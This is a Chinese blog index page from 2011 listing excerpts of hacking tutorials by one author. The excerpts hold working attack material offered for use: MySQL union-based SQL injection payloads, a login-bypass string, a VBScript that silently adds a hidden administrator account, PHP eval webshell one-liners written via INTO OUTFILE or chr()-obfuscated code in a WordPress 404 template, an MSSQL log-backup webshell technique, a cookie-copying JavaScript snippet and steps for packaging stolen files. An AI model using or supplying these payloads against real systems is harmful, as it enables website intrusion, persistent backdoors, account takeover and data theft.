上一页 1 2 3 4 5 6 7 8 ··· 13 下一页
摘要: 暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() /*and 1=2 union all select user() /*操作系统信息:and 1=2 union all se 阅读全文
posted @ 2011-08-31 20:26 WHaa_(T_T) 阅读(313) 评论(0) 推荐(0) 编辑
摘要: 如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码‘or’=’or’,当然进不去,理由是GPC开启的时候单引号会被转换。PHP注入时我常用的万能密码是:‘or 1=1/*.那我们分析一下为什么这可以进后台。如果sql语句这样写:“SELECT * FROM admin where name=’”.$_POST['nam 阅读全文
posted @ 2011-08-31 20:21 WHaa_(T_T) 阅读(327) 评论(0) 推荐(0) 编辑
摘要: dim wsh,FA,FSOset fso=CreateObject("Scripting.FileSystemObject")Set FA= FSO.GetFile(WScript.scriptFullName)FA.Attributes =34set wsh=CreateObject("WScript.Shell")wsh.run "net user asd 123 /add",0,truewsh.run "net localgroup administrators asd /add" ,0,truewsh.R 阅读全文
posted @ 2011-08-31 20:03 WHaa_(T_T) 阅读(329) 评论(0) 推荐(0) 编辑
摘要: php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma, 阅读全文
posted @ 2011-08-31 20:02 WHaa_(T_T) 阅读(1404) 评论(0) 推荐(0) 编辑
摘要: 我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦 copy 文件名/参数 + 文件名/参数 生成文件名 这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀。mdb的数据库中,前提是在我们拿到 一个webshell之后… 我们所知道的,很多站点在用户注册的时候要让填好多东西例如: 用户名、密码、qq、邮箱、个人简介、电话、联系方式... 阅读全文
posted @ 2011-08-31 19:57 WHaa_(T_T) 阅读(303) 评论(0) 推荐(0) 编辑
摘要: 进入后台后台-外观-编辑,找到404的问题插入马,马的代码:<script language=”php”>fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));< 阅读全文
posted @ 2011-08-31 19:54 WHaa_(T_T) 阅读(435) 评论(0) 推荐(0) 编辑
摘要: 有时候一些人对服务器的添加用户的NET和NET1权限做了限制,让很多菜鸟朋友们望而止步。其实个人感觉遇到这个问题都很容易解决的,在此我也共享出我的方法给大家。 cmd命令删除net和net1文件。一般删除之后系统会自动恢复文件,恢复的时候权限是系统重新默认的。大家就可以引用下面这段命令1:del C:\WINDOWS\system32\net.exe2:del C:\WINDOWS\system32\net1.exe你在cmd命令之后你会惊奇的发现可以使用cmd命令来添加系统帐户了,如果提示系统未能找到该文件的话就自己上传一个去,这个我也不用多说了,也就是自己系统下面的net文件xp系统下的n 阅读全文
posted @ 2011-08-31 19:43 WHaa_(T_T) 阅读(417) 评论(0) 推荐(0) 编辑
摘要: 字符型: 1、恢复当前库;alter database 当前库 set RECOVERY FULL–2、建表cmd;create table cmd (a image)–3、备份当前库到D:\cmd1;backup log 当前库 to disk = ‘D:\cmd1′ with init–4、插入一句话代码到创建的表cmd;insert into cmd (a) values (‘<%%25**ecute(request(“a”))%%25>’)–5、备份一句话代码到站点根目录;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–6、完成; 阅读全文
posted @ 2011-08-31 19:16 WHaa_(T_T) 阅读(218) 评论(0) 推荐(0) 编辑
摘要: javascript:alert;window.clipboardData.setData('text',document.cookie);在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了! 阅读全文
posted @ 2011-08-31 19:14 WHaa_(T_T) 阅读(387) 评论(0) 推荐(0) 编辑
摘要: rar.exe是什么?它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件,比如:SU目录。你想一下,如果su目录文件这么多,难道你要一个个的下载??这明显就很麻烦,有了 rar.exe一切变的简单了!好了现在来介绍它的用法吧!得到了Webshell后,最好自己传一个rar.exe,虽然program files目录有,但是有时执行不了。rar.exe体积200K,呵呵!将就下。在CMDSHELL下执行:D:\1\Rar.exe a -k -r -s -m1 E:\web\1.rar E:\web\。我来介绍下吧,”D:\1\rar.exe”是你上传的rar.e 阅读全文
posted @ 2011-08-31 18:35 WHaa_(T_T) 阅读(535) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 13 下一页